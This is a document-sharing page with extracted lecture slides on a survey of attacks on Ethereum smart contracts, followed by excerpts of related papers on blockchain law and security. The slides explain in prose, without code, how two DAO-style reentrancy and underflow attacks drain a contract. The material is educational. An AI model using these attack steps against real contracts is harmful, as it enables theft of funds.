DOCSLIB.ORG

Smart Contracts”, Their Imaginations Tend to Run Wild

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Smart Contracts”, Their Imaginations Tend to Run Wild “When smart people hear the term “smart contracts”, their imaginations tend to run wild. They conjure up dreams of autonomous intelligent software, going off into the world, taking data along for the ride. Unfortunately, the reality of smart contracts is more mundane.” Dr Gideon Greenspan - Founder and CEO of Coin Sciences, Smart Contracts in Ethereum and their Vulnerabilities Alex Harris & Tancredi Castellano Pucci Survey Attacks on Ethereum Smart Contracts Nicola Atzei, Massimo Bartoletti, and Tiziana Cimoli What is a Smart Contract? ● Smart contracts are simply computer programs that can be correctly executed by a network of mutually distrusting nodes, without the need for an external trusted authority (centralization). ● Perhaps should more accurately be called automatic escrow accounts. ● Smart contracts can be used to manage and transfer valuable assets, so it is essential that they execute correctly and are secure against attacks. ● Applications: finance, insurance, e-commerce, auditing and taxation, elections Brief History of Smart Contracts ● Principle of smart contracts first described by Nick Szabo in 1996. ● Digital protocols for information transfer that use algorithms to execute a transaction automatically once the established conditions are met and that fully control the process. ● Why did smart contracts become so closely linked with the distributed ledger? ● Isn’t it wasteful to have every node running the smart contract? ● Bitcoin first appeared in 2008, followed by Ethereum in 2013. ● So far, Ethereum is the best-known and most-used network for smart contracts, so the paper discusses these issues in this context. Smart Contracts on Ethereum ● The consensus protocol specifies how the nodes of the peer-to-peer network extend the blockchain, with the goal of ensuring correct execution. ● Ethereum is written in a Turing-complete language, unlike Bitcoin. The Bitcoin system is purposefully not Turing-complete: it is a left-right stack without loops, making it completely deterministic and avoiding the halting problem. ● Assumptions of the Paper: ○ Ethereum blockchain is immutable. ○ Ethereum is secure if a majority of the computational power is controlled by honest nodes. ○ Ethereum smart contracts execute correctly (still insufficient to make smart contracts secure). Example: A Simple Wallet Contract ● AWallet is run only once, when the contract is created. ● The function pay sends amount wei (10-18 ether) from the contract to recipient. ● The contract throws an exception if the caller is not the owner, or if some ether is attached and ● Note that the function send may transferred to the contract. fail if the recipient is a contract. ● The call terminates if the required amount is unavailable. Why are Ethereum smart contracts so vulnerable? ● Ethereum uses Solidity, a high-level language with counterintuitive semantics, which compiles into EVM bytecode. ○ Solidity looks like a typed Javascript-like language, but has strange feature implementations. ○ Computation steps recorded on a public blockchain, where they can he unpredictably reordered or delayed. ○ When an exception is thrown, it cannot be caught: the execution stops, the fee is lost, and all the side effects — including transfers of ether — are reverted. ● Ethereum uses Turing-complete EVM bytecode, potentially making it vulnerable to the halting problem. ○ Bugs that are appended to the blockchain cannot be changed. ○ Ether lost in transfer. ○ EVM bytecode has no support for functions. Instead, each function has to be uniquely identified by a signature, based on its name and type parameters. Vulnerability Type: Solidity ● Example: Gasless send ● Related to the counterintuitive semantics of Solidity. ● When using send to transfer ether to a contract, it is possible to incur an out-of-gas exception. This is counterintuitive because programmers do not associate transferring ether with executing code. ● c.send(amount) is compiled in the same way as a call with empty signature, but the actual number of gas units available is always bounded. ● Since the call has no signature, it will invoke the callee’s fallback function. ● The upper bound (2300) allows only a limited set of instructions, so in any other case the call will end up in an out-of-gas exception. Vulnerability Type: Solidity ● Example: Keeping secrets ● Fields in contracts can be either public or private. ● Declaring a field to be private does not ensure its secrecy. ● To set the value of a field, users must send a suitable transaction to miners, who will then publish it on the blockchain. It is therefore possible to infer the new value of the field from the public contents of the transaction. ● If necessary, timed commitments and other cryptographic techniques can be used to ensure that the field remains secret. ○ E.g. Applications in multiplayer games. Vulnerability Type: EVM ● Example: Immutable bugs ● Once a contract is published on the blockchain, it cannot be altered. ● This creates a problem if a contract contains a bug, since there is then no direct way to patch it. ● It becomes necessary for programmers to anticipate ways to alter or terminate a contract when implementing it. ● We will see how this vulnerability was exploited in the DAO attack. Vulnerability Type: EVM ● Example: Ether lost in transfer ● When sending ether, it is necessary to specify the recipient’s address. Many of these addresses are orphan, not associated with any user or contract. ● Ether sent to an orphan address is lost forever, and there is no way to detect whether an address is orphan. ● Only option is to ensure the correctness of the recipient addresses manually. ○ How? Vulnerability Type: Blockchain ● Example: Unpredictable state ● The state of a contract is determined by the value of its fields and balance. ● A user cannot be sure that a transaction broadcast to the network will be run in the same state the contract was in at the time of broadcast. ● This is because other transactions may have changed the contract state. Miners are not required to preserve any particular order. ● The actual state also becomes ambiguous in the event of a hard fork. Vulnerability Type: Blockchain ● Example: Time constraints ● Typically implemented using block timestamps agreed upon by all miners. ● All contracts within a block share the same timestamp. ● This means that the miner who creates the new block can choose the timestamp to some degree arbitrarily. The DAO Attack ● The DAO was a contract implementing a crowdfunding platform. ● Raised around $150M before the attack on June 18, 2016. ● Attacker managed to get $60M under control, before a hard fork nullified the effects of the attack transactions. The DAO Attack ● Attack #1: Similar to the actual DAO attack. Allows the adversary to steal all the ether from the SimpleDAO. ● First step: Publish the contract Mallory (see next slide). The adversary donates some ether for Mallory, and invokes withdraw, which transfers the ether to Mallory. The DAO Attack ● Crucial step: The function call used for this purpose has the side effect of invoking Mallory’s fallback function, which maliciously calls back withdraw. ● This causes withdraw to be interrupted before it can update the credit field, allowing the check if (credit[msg.sender] >= amount) to succeed again. ● The DAO therefore sends the credit to Mallory and invokes the fallback again, resulting in a malicious loop. The DAO Attack ● The malicious loop continues until: a. the gas is exhausted; b. the call stack is full; c. the balance of DAO falls to zero. ● Overall, this attack allows the adversary to steal all the ether from the DAO. The DAO Attack ● Attack #2: Similar to Attack #1, except that this time only two calls of the fallback function are required. ● First step: Publish the contract Mallory2, providing it with 1 wei. The adversary invokes attack to donate 1 wei to itself, and withdraws it. The DAO Attack ● The function withdraw checks that the credit is sufficient, and if so transfers the ether to contract Mallory2. ● Once again, call invokes Mallory2’s fallback, which in turn calls withdraw. ● The check succeeds again since withdraw is interrupted as before. ● The DAO sends 1 wei to Mallory2 for a second time, and invokes the fallback again, which does nothing this time. ● The underflow results in a second update to Mallory2’s credit: (2256-1) wei. ● Finally, Mallory2 invokes getJackpot, which steals all the ether from SimpleDAO and transfers it to Mallory2’s owner. The DAO Attack ● Key Vulnerability: Both attacks are possible because SimpleDAO sends the specified amount of ether before updating the credit. These attacks exploit the “call to the unknown” and “reentrancy” vulnerabilities mentioned earlier as general vulnerabilities in the Ethereum network. ● Which is better: Attack #1 or Attack #2? ○ How do the sizes of investment compare between the two attacks? The DAO Attack ● Resolution: HARD FORK ● Parallels between the hard fork in response to the DAO attack and bank bailouts in the wake of the financial crisis? Which vulnerabilities enabled the DAO attack? Which vulnerabilities in Ethereum are you most concerned about? Why? Automatic Analysis of Safety/Soundness of Smart Contracts Why do we need said tools? ● Current state of empirical knowledge within the area is very limited. ○ Educational/Vocational resources are still rare. ● More thoroughly checked contracts are needed given hackers have walked away with 14% of Digital Currencies (approx 10B USD). ● Contracts need to get better but why do we need automatic tools? Why do we need said tools? ● Current state of empirical knowledge within the area is very limited. ○ Educational/Vocational resources are still rare. ● More thoroughly checked contracts are needed given hackers have walked away with 14% of Digital Currencies (approx 10B USD). ● Contracts need to get better but why do we need automatic tools? ○ Yes ■ Manual Auditing remains laborious and error prone. ○ No ■ Contracts tend to be less than 200 lines of code (due to gas cost). ■ 1% of contracts contain 99% of the value in the smart contract ecosystem.
Load more

Recommended publications
  • Securing the Chain
    Securing the chain KPMG International kpmg.com/blockchain360 Foreword It’s no secret that blockchain1 is a potential game changer in financial services and other industries. This is evident by the US$1B investment2 in the technology last year alone. Or the fact that you don’t have to look very far for blockchain use cases, which are as diverse as a foreign exchange market in financial services to the pork supply chain in consumer retailing. Some even see blockchain as a “foundational” technology set to disrupt, enable and change business processing, as we know it across industries. To date, much of the blockchain frenzy has centered on its vast transformative potential across entire industries. So, organizations have focused squarely on “how” they can use blockchain for business. Yet, as more proof of concepts move toward practical implementations and cyber threats rapidly grow in number and sophistication, security and risk management can no longer take a backseat. In addition to “how”, the question then becomes, “Is blockchain secure for my business?” Simply put, it can be. But, not by just turning the key. Security will depend on a variety of factors, none the least of which requires a robust risk management framework. Consider, for example, that as many as half of vulnerability exploitations occur within 10 to 100 days after they are published according to one study3. Then add in the number of threats that are already known. Next, factor in the plethora of unknowns that accompany emerging technologies and you quickly see why a comprehensive view of your risk and threat landscape is necessary.
    [Show full text]
  • Read the Report Brief
    A REVOLUTION IN TRUST Distributed Ledger Technology in Relief & Development MAY 2017 “The principal challenge associated with [DLT] is a lack of awareness of the technology, especially in sectors other than banking, and a lack of widespread understanding of how it works.” - Deloitte Executive Summary1 The Upside In 2016, the blockchain was recognized as one of the top 10 In a recent report, Accenture surveyed emerging technologies by the World Economic Forum.2 The cost data from eight of the world’s ten potential of the blockchain and distributed ledger technology largest investment banks, with the goal of putting a dollar figure against potential (hereinafter “DLT”) to deliver benefits is significant. Gartner cost savings that might be achieved with estimates that DLT will result in $176 billion in added business DLT. The report concluded that the value by 2025; that total reaches $3.1 trillion by 2030.3 banks analyzed could reduce infrastructure costs by an average $8 to Investment in the field reflects the widespread belief that the $12 billion a year. The survey mapped technology can deliver value. Numerous trials, and some more than 50 operational cost metrics deployments, can be found across multiple sectors. and found the savings would break down as follows: Over two dozen countries are investing in DLT 70% savings on central financial More than 2,500 patents have been filed in the last 3 reporting 4 30-50% savings on compliance years 50% savings on centralized operations As of Q4, 2016, 28 of the top 30 banks were engaged in 50% savings on business blockchain proofs-of-concept operations.
    [Show full text]
  • Security Analysis Methods on Ethereum Smart Contract Vulnerabilities — a Survey
    1 Security Analysis Methods on Ethereum Smart Contract Vulnerabilities — A Survey Purathani Praitheeshan?, Lei Pan?, Jiangshan Yuy, Joseph Liuy, and Robin Doss? Abstract—Smart contracts are software programs featuring user [4]. In consequence of these issues of the traditional both traditional applications and distributed data storage on financial systems, the technology advances in peer to peer blockchains. Ethereum is a prominent blockchain platform with network and decentralized data management were headed up the support of smart contracts. The smart contracts act as autonomous agents in critical decentralized applications and as the way of mitigation. In recent years, the blockchain hold a significant amount of cryptocurrency to perform trusted technology is being the prominent mechanism which uses transactions and agreements. Millions of dollars as part of the distributed ledger technology (DLT) to implement digitalized assets held by the smart contracts were stolen or frozen through and decentralized public ledger to keep all cryptocurrency the notorious attacks just between 2016 and 2018, such as the transactions [1], [5], [6], [7], [8]. Blockchain is a public DAO attack, Parity Multi-Sig Wallet attack, and the integer underflow/overflow attacks. These attacks were caused by a electronic ledger equivalent to a distributed database. It can combination of technical flaws in designing and implementing be openly shared among the disparate users to create an software codes. However, many more vulnerabilities of less sever- immutable record of their transactions [7], [9], [10], [11], ity are to be discovered because of the scripting natures of the [12], [13]. Since all the committed records and transactions Solidity language and the non-updateable feature of blockchains.
    [Show full text]
  • Law and the Blockchain
    Law and the Blockchain Usha 1K Rodrigues* ABSTRACT: All contracts are necessarily incomplete. The inefficiencies of bargainingover every contingency, coupled with humans' innate bounded rationality, mean that contracts cannot anticipate and address every potential eventuality. One role of law is to fill gaps in incomplete contracts with default rules. Emerging technologies have created new, yet equally incomplete, types of contracts that exist outside of this traditionalgapfilling legal role. The blockchain is a distributed ledger that allows the cryptographic recording of transactions and permits "smart" contracts that self-execute automatically if their conditions are met. Because humans code the contracts of the blockchain, gaps in these contracts will arise. Yet in the world of "smart contracting"on the blockchain, there is no placefor the law to step in to supply default rules-no "legal intervention point." The lack of a legal intervention point means that law on the blockchain works in a fundamentally different way from law in the corporealworld. Business organizationallaw provides a prime example of how the law uses default rules to fill gaps in an incomplete contract and how the law works differently in the blockchain context. I. INTRODU CTION ............................................................................. 68o II. ORGANIZATIONAL LAW AS A GAP FILLER ...................................... 686 A. THE FIRM AS AN INCOMPLETEFCONTRACT................................ 686 B. THEORIES OF, TimE CORPORATE FoRM ......................................
    [Show full text]
  • Smart Contracts and Distributed Ledger Technology: a Lawyer's Guide
    Smart Contracts and Distributed Ledger Technology: A Lawyer’s Guide Presented by: Kenneth Moyle Clear Law Institute | 4601 N. Fairfax Dr., Ste 1200 | Arlington | VA | 22203 www.clearlawinstitute.com Questions? Please call us at 703-372-0550 or email us at [email protected] All-Access Membership Program ● Earn continuing education credit (CLE, CPE, SHRM, HRCI, etc.) in all states at no additional cost ● Access courses on a computer, tablet, or smartphone ● Access more than 75 live webinars each month ● Access more than 750 on-demand courses Register within 7 days after the webinar using promo code “7member” to receive a $200 discount off the $799 base price. Learn more and register here: http://clearlawinstitute.com/member Clear Law Institute, © 2017 Smart Contracts and Distributed Ledger Technology A Lawyer’s Guide Agenda Concepts and Confusion Smart Contracts: Theory and Reality The Lexicon • Legal vs. Technical viewpoints • Distributed Ledger • Common Accord • Blockchain Initial Coin Offerings and SAFTs • Cryptocurrency Regulatory Developments • Smart Contracts Statutory Developments Resources www.ClearLawInstitute.com (703) 372-0550 Clear Law Institute, © 2017 “ The digital revolution is radically changing the kinds of relationships we can have. What parts of our hard-won legal tradition will still be valuable in the cyberspace era? ” - Nick Szabo, 1996 “What is the best way to apply these common law principles to the design of our on- line relationships?” Integrity of record Trust in the Enforceability outcome under law www.ClearLawInstitute.com
    [Show full text]
  • Deconstructing the Dao: the Need for Legal Recognition and the Application of Securities Laws to Decentralized Organizations
    DECONSTRUCTING THE DAO: THE NEED FOR LEGAL RECOGNITION AND THE APPLICATION OF SECURITIES LAWS TO DECENTRALIZED ORGANIZATIONS Laila Metjahic† TABLE OF CONTENTS INTRODUCTION .............................................................................................................. 1534 I. BACKGROUND ......................................................................................................... 1537 A. The Basics of the Blockchain and Its Role in Decentralized Organizations ............................................................................................. 1537 B. Smart Contracts and Their Role in Decentralized Organizations ........ 1538 C. What Are Decentralized Organizations? ................................................ 1541 D. Why It Is Necessary to Clarify the Legal Status of the DAO and Other Decentralized Organizations ......................................................... 1546 II. ANALYSIS ................................................................................................................. 1549 A. How U.S. Courts Define a General Partnership ..................................... 1549 B. How U.S. Courts Define a Security .......................................................... 1551 III. PROPOSAL ................................................................................................................ 1553 A. The DAO Is a General Partnership .......................................................... 1553 B. Even If the DAO Is Not a General Partnership, It Is Nevertheless a Joint Venture
    [Show full text]
  • The DAO Chronology of a Daring Heist and Its Resolution the DAO | Chronology of a Daring Heist and Its Resolution
    The DAO Chronology of a daring heist and its resolution The DAO | Chronology of a daring heist and its resolution “[the] Digital currency Ethereum is cratering because of a US$50 million hack” Business Insider on 17.06.2016 2 The DAO | Chronology of a daring heist and its resolution It has been the saga of the summer for anyone interested in digital currency and beyond. Within hours the value of the ETH plunged as a result of a hack which relieved the DAO, a massive blockchain-based crowdfunding project, of ETH worth US$50 million. The heist was covered by a number of mainstream journals which published the Decentralized Autonomous news with a varying amount of technical Organizations detail, mostly highlighting the risks A commonly accepted definition involved in dealing in digital currencies. of DAOs some times also referred to as DACs (Decentralized What happened was – of course – a Autonomous Companies) has not severe setback for one of the best-known yet evolved. Usually the terms blockchain-based business applications. refer to a more or less complex It is therefore important to understand interacting set of smart contracts exactly what happened and draw the being able to resemble the necessary consequences in order to fundamentals of organizations, improve the technology. interacting with individuals and dealing with some sort of In order to grasp the whole story about property. the hack of the DAO, it is important to understand what a DAO is and on what Smart contracts can be platform it was deployed: the blockchain seen as the simplest form of platform Ethereum.
    [Show full text]
  • The DAO Attack Or, How to Steal $60 Million with Smart Contracts
    The DAO Attack or, How To Steal $60 Million With Smart Contracts By Charles Lin for CS 261 Tuesday, September 12, 2018 Today, we are covering... ● Decentralized Autonomous Organizations (DAOs) ● The DAO Attack: story and technical details ● Aftermath and implications What is a Decentralized Autonomous Organization? What is a Company? What is a Company? ● A legal entity that people can purchase shares of ● People can use shares to vote on how to spend company assets ● Behaviour enforced by people ● Reneging punished by law ● People don’t always agree on the rules ● People don’t always follow the rules ● Legal punishment is a deterrent, not absolute enforcement, and does not repair damage What is a Company? ● A legal entity that people can purchase shares of ● People can use shares to vote on how to spend company assets ● Behaviour enforced by people ● Reneging punished by law What is a Company? ● A legal entity that people can purchase shares of ● People can use shares to vote on how to spend company assets ● Behaviour enforced by people ● Reneging punished by law What is a Decentralized Autonomous Organization? ● A contract that people can purchase shares of ● People can use shares to vote on how to spend contract’s ether balance ● Behaviour enforced by code ● Reneging impossible! “The” DAO slock.it and “The DAO” ● April 2016 ● German startup called slock.it - smart locks connected to blockchain ● Started a venture capital DAO to get the community to fund their startup and other startups of their choice ● Called it “The DAO” The DAO Code (simplified) from Atezi et al.
    [Show full text]
  • Antitrust Implications of Progressive Decentralization in Blockchain Platforms
    Washington and Lee Law Review Online Volume 77 Issue 2 Article 6 3-29-2021 A Tale of Two Regulators: Antitrust Implications of Progressive Decentralization in Blockchain Platforms Evan Miller Vinson & Elkins LLP, [email protected] Follow this and additional works at: https://scholarlycommons.law.wlu.edu/wlulr-online Part of the Antitrust and Trade Regulation Commons, Science and Technology Law Commons, and the Securities Law Commons Recommended Citation Evan Miller, A Tale of Two Regulators: Antitrust Implications of Progressive Decentralization in Blockchain Platforms, 77 WASH. & LEE L. REV. ONLINE 387 (2021), https://scholarlycommons.law.wlu.edu/wlulr-online/ vol77/iss2/6 This Development is brought to you for free and open access by the Law School Journals at Washington & Lee University School of Law Scholarly Commons. It has been accepted for inclusion in Washington and Lee Law Review Online by an authorized editor of Washington & Lee University School of Law Scholarly Commons. For more information, please contact [email protected]. A Tale of Two Regulators: Antitrust Implications of Progressive Decentralization in Blockchain Platforms Evan Miller* Abstract Competition regulators have identified the potential for blockchain technology to disrupt traditional sponsor-led platforms, like app stores, that have received increased antitrust scrutiny. Enforcement actions by securities regulators, however, have forced blockchain-based platforms to adopt a strategy of progressive decentralization, delaying decentralization objectives in favor of the centralized model that competition regulators hope they will disrupt. This regulatory tension, and the implications for blockchain’s procompetitive potential, have yet to be explored. This Article first identifies the origin of this tension and its consequences through a competition law lens, and then recommends that competition regulators account for this tension in monitoring the blockchain industry and strive to resolve it moving forward.
    [Show full text]
  • BLOCKCHAIN&Lrs
    BLOCKCHAIN&LRs ● Introduction ● Key elements BC ● SC ● Should we use it? ● Principles-Projects Encription Keys MD5 Hashing Algorith Are we decentralized yet? Smart Contracts Nick Szabo :“a set of promises, specified in digital form, including protocols within which the parties perform on the other promises” Vending Machine SC are self suficient. Doesn't need the suport of the state SC questions ● Binding vs Automatic Execution ● Who signs? Is he really him? Minor? ● Fully understands? Informed? ● Freedom ways of contract ● Digital breach ● Are we going to standard contracts? Do we want that? ● Who writes them? Responsability. DAO To the DAO and the Ethereum community, I have carefully examined the code of The DAO and decided to participate after f inding the feature where splitting is rewarded with additional ether. I have made use of this feature and have rightfully claimed 3,641,694 ether, and would like to thank the DAO for this reward. It is my understanding that the DAO code contains this feature to promote decentralization and encourage the creation of "child DAOs”. I am disappointed by those who are characterizing the use of this intentional feature as "theft". I am making use of this explicitly coded feature as per the smart contract terms and my law f irm has advised me that my action is fully compliant with United States criminal and tort law. For reference please review the terms of the DAO: "The terms of The DAO Creation are set forth in the smart contract code existing on the Ethereum blockchain at 0xbb9bc244d798123fde783fcc1c72d3bb8c189413. Nothing in this explanation of terms or in any other document or communication may modify or add any additional obligations or guarantees beyond those set forth in The DAO’s code.
    [Show full text]
  • Understanding and Discovering Attacks on Ethereum Decentralized Applications
    Evil Under the Sun: Understanding and Discovering Attacks on Ethereum Decentralized Applications Liya Su1,2,3 ∗,† Xinyue Shen1,4∗,† Xiangyu Du1,2,3,∗ Xiaojing Liao1, XiaoFeng Wang1, Luyi Xing1, Baoxu Liu2,3 1Indiana University Bloomington, 2Institute of Information Engineering, Chinese Academy of Sciences, 3University of Chinese Academy of Sciences, 4Alibaba Group {liyasu, shen12, duxian}@iu.edu, {xliao, xw7, luyixing}@indiana.edu, [email protected] Abstract the DAO attack that caused a loss over 50 million USD [39] in 2016, resulting in the hard-fork in Ethereum. Also found in The popularity of Ethereum decentralized applications our study is that miscreants took 14K Ethers from the victim (Dapps) also brings in new security risks: it has been re- Dapps with most financial losses (i.e., Fomo3D, Section 4.5). ported that these Dapps have been under various kinds of attacks from cybercriminals to gain profit. To the best of With this significant threat, the community’s understanding our knowledge, little has been done so far to understand this about the new type of cybercrimes is still very limited: to new cybercrime, in terms of its scope, criminal footprints the best of our knowledge, no extensive forensic analysis and attack operational intents, not to mention any efforts to on Dapp attacks has ever been reported, nor has any cyber investigate these attack incidents automatically on a large threat intelligence (CTI) been collected from them to find out scale. In this paper, we performed the first measurement study the perpetrator’s strategy, capability and infrastructure, not to on real-world Dapp attack instances to recover critical threat mention to utilize the knowledge to mitigate the threat.
    [Show full text]
  • Ripple Effects: How in Re Ripple Labs Inc
    RIPPLE EFFECTS: HOW IN RE RIPPLE LABS INC. LITIGATION COULD SIGNAL THE BEGINNING OF THE END OF THE PAYMENT PLATFORM LINDSAY MARTIN† ABSTRACT Ripple Labs provides an international payment network that allows financial institutions to transfer money more cheaply and quickly than traditional international payments. Ripple’s native digital currency, XRP, supports global payments by acting as intermediate currency between different currencies, eliminating correspondent bank’s need to hold deposits in foreign currencies. In an ongoing class action lawsuit, XRP purchasers claim that the digital asset qualifies as a security under federal securities laws and that Ripple illegally offered and sold XRP as an unregistered security. Given Ripple’s rising prominence as a tool for financial institutions, this pending case will impact cryptocurrency markets and international payments. Because XRP is most likely a security subject to regulation by the Securities and Exchange Commission (SEC), this matter poses an existential threat to the Ripple network. This note examines the legal issues leading up to the Ripple litigation and explains why XRP is most likely a security. It concludes by discussing the SEC’s likely approach to Ripple’s unregistered Initial Coin Offering (ICO). INTRODUCTION Today, most global payments rely on outdated technology.1 To transact with entities in foreign countries, financial institutions must be members of the Society for Worldwide Interbank Financial Telecommunications (SWIFT) network2 and maintain a correspondent banking relationship with a bank in that foreign country.3 The process is slow, expensive, and carries risks that international payments will not reach their intended destination due to the lack of an international central settlement institution.4 † Duke University School of Law, J.D.
    [Show full text]